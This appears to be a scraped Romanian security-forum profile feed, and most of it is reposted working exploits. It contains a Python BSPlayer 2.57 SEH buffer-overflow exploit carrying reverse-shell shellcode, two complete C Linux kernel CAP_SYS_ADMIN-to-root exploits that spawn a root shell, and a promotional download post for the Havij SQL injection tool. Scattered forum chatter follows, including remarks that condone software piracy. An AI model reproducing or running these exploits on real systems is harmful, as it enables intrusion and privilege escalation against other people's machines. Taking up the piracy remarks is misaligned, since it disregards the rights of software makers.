Nytro

Advanced MySQL Exploitation Author: Muhaimin Dzulfakar Contents 1 Abstract...........................................................................................................................................3 2 Introduction ...................................................................................................................................3 3 Stacked Query................................................................................................................................3 4 Attacking MySQL on applications that do support stacked queries...............................................4 5 Attacking MySQL on applications that do not support stacked queries........................................5 6 Fingerprinting the web server directory.........................................................................................7 6.1 Fingerprint through error message method................................................................................7 6.2 Fingerprint through LOAD_FILE method......................................................................................7 7 Maximum size of arbitrary code allowed........................................................................................7 8 Arbitrary file compression/decompression ....................................................................................8 9 Dealing with columns......................................................................................................................8 10 Remote code execution on LAMP.................................................................................................9 11 Remote code execution on WAMP.............................................................................................10 References .......................................................................................................................................11 Download: http://www.exploit-db.com/download_pdf/15956 Vedeti referintele.

Exploit Buffer Overfloe Bsplayer 2.57(UNICODE-SEH) Nu stiu daca merge, dar daca merge se pot face lucruri dragute cu el. # # #[+]Exploit Title: Exploit Buffer Overfloe Bsplayer 2.57(UNICODE-SEH) #[+]Date: 01\07\2010 #[+]Author: C4SS!0 G0M3S #[+]Software Link: http://www.bsplayer.com/services/downlad-free-bsplayer.php?type=2 #[+]Version: 2.57 #[+]Tested on: WIN-XP SP3 PORTUGUESE BRAZILIAN #[+]CVE: N/A # # # ######### ## ######### ######### ## ############### # ######### #### ######### ######### ## ## ## # ## ## ## ## ## ## ## ## # ## ## ## ## ## ## ## ## # ## ########## ######## ######## ## ## ## # ## ## ## ## ## ## ## # ## ## ## ## ## ## ## # ######## ## ######## ######### ## ## ## # ######## ## ######## ######### \/ ############### # #Created By C4SS!0 G0M3S #Louredo_@hotmail.com #www.invasao.com.br # # import os import sys import time import string os.system("cls") os.system("color 4f") def usage(): print "\n" print "[+]Exploit: Exploit Buffer Overflow Bsplayer(UNICODE-SEH)" print "[+]Date: 01\\07\\2010" print "[+]Author: C4SS!0 G0M3S" print "[+]Home: www.invasao.com.br" print "[+]E-mail: Louredo_@hotmail.com" print "[+]Version: 2.57" print "[+]Software: Bsplayer 2.57\n" print "[-]Note:" print "TO EXPLOIT THE RUN FILE NAME MUST BE FILE_NAME.M3U\n" if((len(sys.argv)!=3) or (int(sys.argv[1])<1) or (int(sys.argv[1])>2)): usage() print "Payloads:\n1 - WinExec(\"Calc.exe\",0)\n2 - Reverse_Tcp_Shell\n" print "[-]Usage: "+sys.argv[0]+" <Playload Number> <File Name>" print "[-]Exemple: "+sys.argv[0]+" 1 Exploit.m3u" sys.exit(0) usage() buffer = "\x42" * 4102 nseh = "\x61\x6d" seh = "\xde\x4e" #pop ebx - pop ebp - ret at 0x004E00DE [bsplayer.exe] egg_hunter = "\x45\x61\x45\x61\x45\x50\x45\xc3" junk = "\x45" * 1094 print "[*]Identifying the length Shellcode" time.sleep(1) if int(sys.argv[1]) == 2: shellcode = ("PPYAIAIAIAIAQATAXAZAPA3QADAZABARALAYAIAQAIAQAPA5AAAPAZ1AI1AIAIAJ11AIAIAXA58AAPAZ" "ABABQI1AIQIAIQI1111AIAJQI1AYAZBABABABAB30APB944JBNKWY7N4PV9X6PQX1PV9JYNZ9SDMTZTR" # "83SY0KT01RPLLLCBPLLT2RLPJX9KKTOX3NZUKKV0VLK3Y3MLRONMMJU2VWC8VQKQSOPTZT3CTK1LPUR6" # "KZR65RJC7NPWDLVRZQUMFMV85BXR7BOG8SCKUNXUVMVGIPMKJJZ6XSQ40ORI2UTOWNWRXVF679XJWYPL" #FROM METASPLOIT FRAMEWORK "OU2QOXQNN0GGLNM3HJLRVWUSKO4OWMVOZKXLKLY2B3U1BQMPEBVMQEEFULKP12N8GHWH43CROTS2NPPD" # "QT0YXLS5MOM3OCKSRWPFLJWWN19PSXXOFKYD7KLN3WYMFFEJY7LO785W6C1TM7MOURUH7EOM1FZTEMOJ" #SHELLCODE REVERSE_TCP_SHELL ON PORT 4444 "28TUN2LK0SKNTKKPHJSDRKLFONNC2620QXQTRFZUE3UGR8TOL5V3YO47PRSMMBURNNL9MNEHNELX5NOW" # "Q8C5UPOLK3BIRSQBOXVDD9STOI8LHBM1Y3PEPOKMQOMKRN8JZIJ3MPJ0VRRYY92VP0DLVJ3TVJFWKSKB" #PROMPT: "QCMXW7O30CRZRF7JK7JV4S2SRM9M5RRTOZZVFYQQDKKW1LY7S6LZFJLLZNXMJB685QOJGLNKNITOCZSK" # "QITVVPONFL6LN0O1RVBINM6OLML4XL0TNL6RRVN28UOKSULQJXYLLY9NLM57LVDS8NY2PMQ3MORRMHQD" #C:\>Telnet 127.0.0.1 4444 "BEINV9QY8U0MN1ZTUPPO3KGMVDOQWLNEUOJLWKE6UPNMBX12QURRNVJN78DYMXKOMHNA") # # if int(sys.argv[1]) == 1: shellcode = ("PPYAIAIAIAIAQATAXAZAPA3QADAZABARALAYAIAQAIAQAPA5AAAPAZ1AI1AIAIAJ11AIAIAXA58AAPAZ" "ABABQI1AIQIAIQI1111AIAJQI1AYAZBABABABAB30APB944JBIKY0NQ99GO3LLVRPHLXY2TMTL46QMNR" "8P1SHN853YXKLKSSHQXL4TENPSHWL3599RX6VNCJUKCH4VNSMM25ZOJP2MLWORBZMMM1DJ5QVO9MQ9W4" "V30ZUBQWZLFP5KELTXGCLKKMKLE2KZPNG9MOXKMNBNXMKVBK893KGOKSJXOPLPOMS8SR3UTPWKGHXOKT" "CDN4CMOQG1C34R171NSXML5WVKE7QSN4XL5VJZQM5W8O669OMOK90J9KN0Q31VVLNNOCUN957X7SHNOP" "YTP3KXWLE3O9XCKXJA") print "[*]The Length Shellcode:"+str(len(shellcode)) time.sleep(1) shellcode += "\x41" * 5000 file = str(sys.argv[2]) payload = buffer+nseh+seh+egg_hunter+junk+shellcode op = "w" print "[*]Creating Your File "+file time.sleep(1) try: f = open(file,op) f.write("http://"+payload) f.close() print "[*]The File "+file+" was Successfully Created" except: print "[*]Error Creating File "+file Sursa: BS.Player 2.57 Buffer Overflow Exploit (Unicode SEH)

Linux Kernel CAP_SYS_ADMIN to Root Exploit 2 (32 and 64-bit) Nu m-am uitat peste el, o sa vad care e treaba cand am putin timp liber. /* * Linux Kernel CAP_SYS_ADMIN to Root Exploit 2 (32 and 64-bit) * by Joe Sylve * @jtsylve on twitter * * Released: Jan 7, 2011 * * Based on the bug found by Dan Rosenberg (@djrbliss) * only loosly based on his exploit http://www.exploit-db.com/exploits/15916/ * * Usage: * gcc -w caps-to-root2.c -o caps-to-root2 * sudo setcap cap_sys_admin+ep caps-to-root2 * ./caps-to-root2 * * Kernel Version >= 2.6.34 (untested on earlier versions) * * Tested on Ubuntu 10.10 64-bit and Ubuntu 10.10 32-bit * * This exploit takes advantage of the same underflow as the original, * but takes a different approach. Instead of underflowing into userspace * (which doesn't work on 64-bit systems and is a lot of work), I underflow * to some static values inside of the kernel which are referenced as pointers * to userspace. This method is pretty simple and seems to be reliable. */ #include <stdio.h> #include <sys/socket.h> #include <errno.h> #include <string.h> #include <sys/mman.h> #include <unistd.h> // Skeleton Structures of the Kernel Structures we're going to spoof struct proto_ops_skel { int family; void *buffer1[8]; int (*ioctl)(void *, int, long); void *buffer2[12]; }; struct phonet_protocol_skel { void *ops; void *prot; int sock_type; }; #ifdef __x86_64__ #define SYM_NAME "local_port_range" #define SYM_ADDRESS 0x0000007f00000040 #define SYM_OFFSET 0x0 typedef int (* _commit_creds)(unsigned long cred); typedef unsigned long (* _prepare_kernel_cred)(unsigned long cred); #else //32-bit #define SYM_NAME "pn_proto" #define SYM_ADDRESS 0x4e4f4850 #define SYM_OFFSET 0x90 typedef int __attribute__((regparm(3))) (* _commit_creds)(unsigned long cred); typedef unsigned long __attribute__((regparm(3))) (* _prepare_kernel_cred)(unsigned long cred); #endif _commit_creds commit_creds; _prepare_kernel_cred prepare_kernel_cred; int getroot(void * v, int i, long l) { commit_creds(prepare_kernel_cred(0)); return 0; } /* thanks spender... */ unsigned long get_kernel_sym(char *name) { FILE *f; unsigned long addr; char dummy; char sname[512]; int ret; char command[512]; sprintf(command, "grep \"%s\" /proc/kallsyms", name); f = popen(command, "r"); while(ret != EOF) { ret = fscanf(f, "%p %c %s\n", (void **) &addr, &dummy, sname); if (ret == 0) { fscanf(f, "%s\n", sname); continue; } if (!strcmp(name, sname)) { fprintf(stdout, " [+] Resolved %s to %p\n", name, (void *)addr); pclose(f); return addr; } } pclose(f); return 0; } int main(int argc, char * argv[]) { int sock, proto; unsigned long proto_tab, low_kern_sym, pn_proto; void * map; /* Create a socket to load the module for symbol support */ printf("[*] Testing Phonet support and CAP_SYS_ADMIN...\n"); sock = socket(PF_PHONET, SOCK_DGRAM, 0); if(sock < 0) { if(errno == EPERM) printf("[*] You don't have CAP_SYS_ADMIN.\n"); else printf("[*] Failed to open Phonet socket.\n"); return -1; } close(sock); /* Resolve kernel symbols */ printf("[*] Resolving kernel symbols...\n"); proto_tab = get_kernel_sym("proto_tab"); low_kern_sym = get_kernel_sym(SYM_NAME) + SYM_OFFSET; pn_proto = get_kernel_sym("pn_proto"); commit_creds = (void *) get_kernel_sym("commit_creds"); prepare_kernel_cred = (void *) get_kernel_sym("prepare_kernel_cred"); if(!proto_tab || !commit_creds || !prepare_kernel_cred) { printf("[*] Failed to resolve kernel symbols.\n"); return -1; } if (low_kern_sym >= proto_tab) { printf("[*] %s is mapped higher than prototab. Can not underflow .\n", SYM_NAME); return -1; } /* Map it */ printf("[*] Preparing fake structures...\n"); const struct proto_ops_skel fake_proto_ops2 = { .family = AF_PHONET, .ioctl = &getroot, }; struct phonet_protocol_skel pps = { .ops = (void *) &fake_proto_ops2, .prot = (void *) pn_proto, .sock_type = SOCK_DGRAM, }; printf("[*] Copying Structures.\n"); map = mmap((void *) SYM_ADDRESS, 0x1000, PROT_READ | PROT_WRITE | PROT_EXEC, MAP_PRIVATE | MAP_ANONYMOUS, -1, 0); if(map == MAP_FAILED) { printf("[*] Failed to map landing area.\n"); perror("mmap"); return -1; } memcpy((void *) SYM_ADDRESS, &pps, sizeof(pps)); // Calculate Underflow proto = -((proto_tab - low_kern_sym) / sizeof(void *)); printf("[*] Underflowing with offset %d\n", proto); sock = socket(PF_PHONET, SOCK_DGRAM, proto); if(sock < 0) { printf("[*] Underflow failed .\n"); return -1; } printf("[*] Elevating privlidges...\n"); ioctl(sock, 0, NULL); if(getuid()) { printf("[*] Exploit failed to get root.\n"); return -1; } printf("[*] This was a triumph... I'm making a note here, huge success.\n"); execl("/bin/sh", "/bin/sh", NULL); close(sock); munmap(map, 0x1000); return 0; } Sursa: Linux Kernel CAP_SYS_ADMIN to Root Exploit 2 (32 and 64-bit)

Linux Kernel CAP_SYS_ADMIN to root Exploit Nu m-am uitat inca peste el, cand am timp vad care e treaba. /* * Linux Kernel CAP_SYS_ADMIN to root exploit * by Dan Rosenberg * @djrbliss on twitter * * Usage: * gcc -w caps-to-root.c -o caps-to-root * sudo setcap cap_sys_admin+ep caps-to-root * ./caps-to-root * * This exploit is NOT stable: * * * It only works on 32-bit x86 machines * * * It only works on >= 2.6.34 kernels (it could probably be ported back, but * it involves winning a race condition) * * * It requires symbol support for symbols that aren't included by default in * several distributions * * * It requires the Phonet protocol, which may not be compiled on some * distributions * * * You may experience problems on multi-CPU systems * * It has been tested on a stock Ubuntu 10.10 installation. I wouldn't be * surprised if it doesn't work on other distributions. * * ---- * * Lately there's been a lot of talk about how a large subset of Linux * capabilities are equivalent to root. CAP_SYS_ADMIN is a catch-all * capability that, among other things, allows mounting filesystems and * injecting commands into an administrator's shell - in other words, it * trivially allows you to get root. However, I found another way to get root * from CAP_SYS_ADMIN...the hard way. * * This exploit leverages a signedness error in the Phonet protocol. By * specifying a negative protocol index, I can craft a series of fake * structures in userspace and cause the incrementing of an arbitrary kernel * address, which I then leverage to execute arbitrary kernel code. * * Greets to spender, cloud, jono, kees, pipacs, redpig, taviso, twiz, stealth, * and bla. * */ #include <stdio.h> #include <fcntl.h> #include <sys/socket.h> #include <errno.h> #include <string.h> #include <linux/capability.h> #include <sys/utsname.h> #include <sys/mman.h> #include <unistd.h> typedef int __attribute__((regparm(3))) (* _commit_creds)(unsigned long cred); typedef unsigned long __attribute__((regparm(3))) (* _prepare_kernel_cred)(unsigned long cred); _commit_creds commit_creds; _prepare_kernel_cred prepare_kernel_cred; int getroot(void) { commit_creds(prepare_kernel_cred(0)); return 0; } int konami(void) { /* Konami code! */ asm("inc %edx;" /* UP */ "inc %edx;" /* UP */ "dec %edx;" /* DOWN */ "dec %edx;" /* DOWN */ "shl %edx;" /* LEFT */ "shr %edx;" /* RIGHT */ "shl %edx;" /* LEFT */ "shr %edx;" /* RIGHT */ "push %ebx;" /* B */ "pop %ebx;" "push %eax;" /* A */ "pop %eax;" "mov $getroot, %ebx;" "call *%ebx;"); /* START */ return 0; } /* thanks spender... */ unsigned long get_kernel_sym(char *name) { FILE *f; unsigned long addr; char dummy; char sname[512]; struct utsname ver; int ret; int rep = 0; int oldstyle = 0; f = fopen("/proc/kallsyms", "r"); if (f == NULL) { f = fopen("/proc/ksyms", "r"); if (f == NULL) return 0; oldstyle = 1; } while(ret != EOF) { if (!oldstyle) ret = fscanf(f, "%p %c %s\n", (void **)&addr, &dummy, sname); else { ret = fscanf(f, "%p %s\n", (void **)&addr, sname); if (ret == 2) { char *p; if (strstr(sname, "_O/") || strstr(sname, "_S.")) continue; p = strrchr(sname, '_'); if (p > ((char *)sname + 5) && !strncmp(p - 3, "smp", 3)) { p = p - 4; while (p > (char *)sname && *(p - 1) == '_') p--; *p = '\0'; } } } if (ret == 0) { fscanf(f, "%s\n", sname); continue; } if (!strcmp(name, sname)) { fprintf(stdout, " [+] Resolved %s to %p\n", name, (void *)addr); fclose(f); return addr; } } fclose(f); return 0; } int main(int argc, char * argv[]) { int sock, proto, i, offset = -1; unsigned long proto_tab, landing, target, pn_ops, pn_ioctl, *ptr; void * map; /* Create a socket to load the module for symbol support */ printf("[*] Testing Phonet support and CAP_SYS_ADMIN...\n"); sock = socket(PF_PHONET, SOCK_DGRAM, 0); if(sock < 0) { if(errno == EPERM) printf("[*] You don't have CAP_SYS_ADMIN.\n"); else printf("[*] Failed to open Phonet socket.\n"); return -1; } /* Resolve kernel symbols */ printf("[*] Resolving kernel symbols...\n"); proto_tab = get_kernel_sym("proto_tab"); pn_ops = get_kernel_sym("phonet_dgram_ops"); pn_ioctl = get_kernel_sym("pn_socket_ioctl"); commit_creds = get_kernel_sym("commit_creds"); prepare_kernel_cred = get_kernel_sym("prepare_kernel_cred"); if(!proto_tab || !commit_creds || !prepare_kernel_cred || !pn_ops || !pn_ioctl) { printf("[*] Failed to resolve kernel symbols.\n"); return -1; } /* Thanks bla, for reminding me how to do basic math */ landing = 0x20000000; proto = 1 << 31 | (landing - proto_tab) >> 2; /* Map it */ printf("[*] Preparing fake structures...\n"); map = mmap((void *)landing, 0x10000, PROT_READ | PROT_WRITE | PROT_EXEC, MAP_PRIVATE | MAP_ANONYMOUS | MAP_FIXED, 0, 0); if(map == MAP_FAILED) { printf("[*] Failed to map landing area.\n"); return -1; } /* Pointer to phonet_protocol struct */ ptr = (unsigned long *)landing; ptr[0] = &ptr[1]; /* phonet_protocol struct */ for(i = 1; i < 4; i++) ptr[i] = &ptr[4]; /* proto struct */ for(i = 4; i < 204; i++) ptr[i] = &ptr[204]; /* First, do a test run to calculate any offsets */ target = 0x30000000; /* module struct */ for(i = 204; i < 404; i++) ptr[i] = target; /* Map it */ map = mmap((void *)0x30000000, 0x2000000, PROT_READ | PROT_WRITE | PROT_EXEC, MAP_PRIVATE | MAP_ANONYMOUS | MAP_FIXED, 0, 0); if(map == MAP_FAILED) { printf("[*] Failed to map landing area.\n"); return -1; } printf("[*] Calculating offsets...\n"); socket(PF_PHONET, SOCK_DGRAM, proto); ptr = 0x30000000; for(i = 0; i < 0x800000; i++) { if(ptr[i] != 0) { offset = i * sizeof(void *); break; } } if(offset == -1) { printf("[*] Test run failed.\n"); return -1; } /* MSB of pn_ioctl */ target = pn_ops + 10 * sizeof(void *) - 1 - offset; /* Re-fill the module struct */ ptr = (unsigned long *)landing; for(i = 204; i < 404; i++) ptr[i] = target; /* Push pn_ioctl fptr into userspace */ printf("[*] Modifying function pointer...\n"); landing = pn_ioctl; while((landing & 0xff000000) != 0x10000000) { socket(PF_PHONET, SOCK_DGRAM, proto); landing += 0x01000000; } /* Map it */ map = mmap((void *)(landing & ~0xfff), 0x10000, PROT_READ | PROT_WRITE | PROT_EXEC, MAP_PRIVATE | MAP_ANONYMOUS | MAP_FIXED, 0, 0); if(map == MAP_FAILED) { printf("[*] Failed to map payload area.\n"); return -1; } /* Copy payload */ memcpy((void *)landing, &konami, 1024); printf("[*] Executing Konami code at ring0...\n"); ioctl(sock, 0, NULL); if(getuid()) { printf("[*] Exploit failed to get root.\n"); return -1; } printf("[*] Konami code worked! Have a root shell.\n"); execl("/bin/sh", "/bin/sh", NULL); } Sursa: Linux Kernel CAP_SYS_ADMIN to root Exploit

Havij v1.14 Advanced SQL Injection Jan 08, 2011 Description: Havij is an automated SQL Injection tool that helps penetration testers to find and exploit SQL Injection vulnerabilities on a web page. It can take advantage of a vulnerable web application. By using this software user can perform back-end database fingerprint, retrieve DBMS users and password hashes, dump tables and columns, fetching data from the database, running SQL statements and even accessing the underlying file system and executing commands on the operating system. The power of Havij that makes it different from similar tools is its injection methods. The success rate is more than 95% at injectiong vulnerable targets using Havij. The user friendly GUI (Graphical User Interface) of Havij and automated settings and detections makes it easy to use for everyone even amateur users. What's New? * Sybase (ASE) database added. * Sybase (ASE) Blind database added. * Time based method for MsSQL added. * Time based method for MySQL added. * mod_security bypass added. * Pause button added. * Basic authentication added * Digest authentication added. * Post Data field added * bugs related with dot character in database name fixed * syntax over writing when defined by user in blind injections fixed. * mssql database detection from error when using JDBC driver corrected. * time out bug in md5 cracker fixed. * default value bug fixed * string encode bug fixed in PostgreSQL * injecting URL rewrite pages added. * injecting into any part of http request like Cookie, User-Agent, Referer, etc made available * a bug in finding string column fixed. (specially for MySQL) * Finding columns count in mysql when input value is non effective added. * window resize bug in custom DPI setting fixed. * some bugs in finding row count fixed. * getting database name in mssql error based when injection type is guessed integer but it's string fixed. Features: http://itsecteam.com/en/projects/project1.htm How to use This tool is for exploiting SQL Injection bugs in web application. For using this tool you should know a little about SQL Injections. Enter target url and select http method then click Analyze. Note: Try to url be valid input that returns a normal page not a 404 or error page. Download: http://itsecteam.com/files/havij/Havij1.14Free.rar Hai baietii, fiti 1337 (script-kiddie...), aratati ca sunteti in stare sa folositi un program si vreau sa vad aere de mai hackeri la Show Off PS: Nu l-am incercat, nu stiu daca e infectat, dar cum il veti descarca de pe site-ul oficial cred ca nu este nici o problema.

Deocamdata nu am timp, o sa incep sesiunea, dar dupa seseiune o sa aloc mai mult timp pentru RST (daca nu ma angajez undeva) si treburile vor merge mai bine.

Si cam ce anume s-ar posta acolo? Ce ati posta de exemplu? Vreau niste exemple concrete. Ceva imi spune ca va fi cam pustie acea categorie.

Poate nu au poze clare cu acea galaxie si au vrut doar sa arate o imagine asemanatoare acelei galaxii. Ma refer la faptul ca este posibil sa aiba multe informatii despre acea galaxie, dar nu o fotografie concreta care sa fie relativ clara si care sa poata fi afisata publicului larg, astfel au creat acea imagine mai mult descriptiva a acelei fotografii.

Normal, stiri gen "Cancan", adica de 2 lei. Nici eu nu as vrea sa se inchida. Poti afla incredibil de mult informatii despre prieteni, despre cum gandesc, despre ce fac, tot felul de prostii.

Multumesc tuturor si la multi ani celorlalti membri care isi serbeaza azi ziua de nastere. Sa beti ceva si pentru mine, si eu o sa beau ceva pentru voi. romanu: Nu toti moderatorii/administratorii sunt Ioni PS: Ma puteti injura, critica etc. Nu ma supar, nu dau warn/ban. Hai, cat aveti ocazia :->

Haaa mersi boss, la multi ani si tie bre, sa ne traiesti. :-> Trebuie sa ne dam de baut unu altuia. Oricum inca trebuie sa iti dau 2 beri Mersi baieti. Azi nu dau banuri/warnuri

Sunt usoare, doar 9 e greu, trebuie sa faci Backtracking.

Warn tuturor. E treaba administratorilor si a moderatorilor asta. Ati facut offtopic toti

Toate sunt JavaScript. Nu sunt grele, trebuie doar putina imaginatie. Deocamdata sunt la nivelul 9, cred ca trec mai departe maine. http://www.telerie-effegibi.it/daniele/default.asp?lev=1 Bafta.

Windows? Nu, Linux. Si asta inseamna: nici un program piratat. Doar muzica (manele) mai descarc din cand in cand, si filme. De ce sa dau bani pe ceva cand pot avea gratis? E modul clasic si practic de a gandi.

Nu piratam (poate doar unii dintre noi, intr-o mica masura), noi doar folosim produse piratate de altii, de fapt noi suntem victime ale pirateriei

Ubuntu, Mandriva. Poti cauta tutoriale de instalare si de folosire, sunt o gramada.

Acrobat Reader, adica Adobe Reader, pentru a putea vizualiza fisiere PDF. Desi sunt si multe alte alternative.

Pare mai serios decat Blackbuntu, dar lista de tool-uri preinstalate este mai mica, si nu cred ca ma refer numai la cele de pentest. Hmm, sunt sigur ca o sa il incerc, dar deocamdata raman la ce am. Oricum, din moment ce e bazat pe Ubuntu e clar ca e extrem de prietenos cu utilizatorii, deci nu cred ca e o problema sa il foloseasca si cei care nu au mai folosit Linux pana acum.

Pacaleala de 1 aprilie? Dupa atata timp se mai gaseste un ratat care sa redeschida topicul.

Si cum face toata Europa sa dispara? Imprastie lava pe mii de kilometri? Poate fumul sa se imprastie in toata lumea si sa provoace cine stie ce "iarna nucleara", dar nu vad cum ar putea face sa dispara Europa.

De cea de astazi, de la ora 10.

Sa vedem: informatie, securitate, atac, programare, gratuit, distractie, profit, acces. Cred ca ar fi multe de spus.

Ar fi de preferat in limba romana. De fapt cred ca merge mai bine in engleza. Adica e "Romanian Security Team" nu "Echipa Romana de Securitate"

"Accesul la informatie este un drept, noi sustinem acest drept."